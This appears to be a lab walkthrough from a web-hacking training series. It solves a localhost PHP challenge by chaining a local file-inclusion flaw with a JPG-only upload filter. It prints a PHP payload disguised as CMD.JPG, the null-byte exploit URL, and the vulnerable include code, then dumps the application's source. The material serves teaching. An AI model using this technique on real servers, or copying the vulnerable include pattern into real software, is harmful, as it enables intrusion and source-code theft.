Task 6 | Hacker Web Exploition Uncovered

Investigate the system using the tip.

Send a value of the path GET parameter.

http://localhost/zadachi/6/?path=abc'
Warning: main(./abc'config.inc.php): failed to open stream: No such file or directory in x:\localhost\zadachi\index.php on line 7 Warning: main(): Failed opening './abc'config.inc.php' for inclusion (include_path='.;c:\php4\pear') in x:\localhost\zadachi\index.php on line 7

http://localhost/zadachi/6/?path=abc'

 Warning: main(./abc'config.inc.php): failed to open stream: No such file or directory in x:\localhost\zadachi\index.php on line 7 Warning: main():  Failed opening './abc'config.inc.php' for inclusion (include_path='.;c:\php4\pear') in x:\localhost\zadachi\index.php on line 7

This request allows you to detect the PHP source code injection vulnerability in the system.

The text of the warning message indicates that there is a string such as Include ("./{$path}config. inc.php") ; somewhere in the code. In other words, the vulnerability is local.

Keep investigating the system.

The system allows you to upload files to a certain folder. Try to upload files with various extensions. After you make a few attempts, you'll find that only files with the JPG extension can be uploaded.

A trick with a "double" extension (.JPG.PHP) won't work. In other words, uploading files isn't vulnerable because you cannot upload a file with a dangerous extension such as PHP.

However, if you exploit the local PHP source code injection vulnerability, you can proceed as follows :

Create a PHP file such as this example, named CMD.PHP:

 <? $f=fopen("index.php", "r"); while($r=fread($f, 1024)) echo $r; fclose($f); ?>

Rename it CMD.JPG and upload it to the server as if it was an image.
Include it using the PHP source code injection vulnerability. When including the file, make sure to delete the right part of the file name .
Execute the file: http://localhost/zadachi/6/?path=upload/cmd.jpg%00
Examine the HTML code of the returned document and find the following piece of code.

http://localhost/zadachi/6/?path=upload/cmd.jpg%00
<? include("./".$path."config.inc.php"); if(!empty($_FILES["userfile"] ["tmp_name"])) { if (preg_match("/\.jpg$/", $_FILES["userfile"]["name"])) { if(move_uploaded_file($_FILES["userfile"] ["tmp_name"], "./upload/ {$_FILES["userfile"]["name"]}")) { echo "<br> <br> Uploaded <a href=\"./upload/{$_FILES["userfile"]["name"]}\">./ upload/{$_FILES["userfile"] ["name"]}</a>"; } } else echo "Uploading only JPG files is allowed"; } ?>

http://localhost/zadachi/6/?path=upload/cmd.jpg%00

 <?   include("./".$path."config.inc.php"); if(!empty($_FILES["userfile"] ["tmp_name"])) {  if (preg_match("/\.jpg$/", $_FILES["userfile"]["name"]))  {     if(move_uploaded_file($_FILES["userfile"] ["tmp_name"], "./upload/     {$_FILES["userfile"]["name"]}"))     {       echo "<br> <br>       Uploaded <a href=\"./upload/{$_FILES["userfile"]["name"]}\">./ upload/{$_FILES["userfile"] ["name"]}</a>";     }    }    else echo "Uploading only JPG files is allowed";   } ?>

This is the code of the INDEX.PHP script you were seeking.

The task is solved .